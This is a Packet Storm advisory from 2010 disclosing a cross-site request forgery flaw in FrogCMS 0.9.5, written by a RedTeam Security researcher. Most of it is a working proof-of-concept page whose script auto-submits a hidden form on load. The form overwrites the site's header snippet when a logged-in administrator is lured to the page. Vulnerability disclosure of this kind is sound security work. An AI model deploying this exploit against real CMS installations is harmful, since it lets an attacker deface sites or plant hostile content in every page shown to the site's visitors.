FrogCMS 0.9.5 Cross Site Request Forgery

2010-06-12T00:00:00
ID PACKETSTORM:90592
Type packetstorm
Reporter Jeremiah Talamantes
Modified 2010-06-12T00:00:00

Description

                                        
                                            `# Software : FrogCMS v0.9.5  
# Author : Jeremiah Talamantes for RedTeam Security  
# Date : June 10, 2010  
# OS : Windows  
# Tested on : XP SP2 EN (Virtual PC)  
# Type of vuln : CSRF  
  
# Description :  
# Lack of security controls in place to prevent Cross Site   
# Request Forgery attacks. The POC below will open a core  
# module (snippet) containing HTML that rendered as the  
# "header" for each page.  
#  
# An attacker can trick an authenticated user (email phish)   
# into clicking on a malicious web page (POC) that is   
# designed to overwrite the contents of the default HEADER   
# snippet.  
  
# RedTeam Security / RedTeam Security Labs  
# http://www.redteamsecure.com/labs  
  
# POC Code  
  
<html>  
<head>  
<title>FrogCMS CSRF</title>  
<script type="text/javascript">  
function myfunc () {  
var frm = document.getElementById("csrf");  
frm.submit();  
}  
window.onload = myfunc;  
</script>  
</head>  
<body>  
<!-- Update the form action parameter to match the victim FrogCMS URL -->  
<form id="csrf" action="http://localhost/frogcms/admin/?/snippet/edit/1" method="post">  
<input type="hidden" id="snippet_name" name="snippet[name]" value="FrogCMS CSRF" />  
<input type="hidden" id="snippet_filter_id" name="snippet[filter_id]" value="" />  
<input type="hidden" id="snippet_content" name="snippet[content]" value="FrogCMS CSRF" />  
</form>  
</body>  
</html>  
`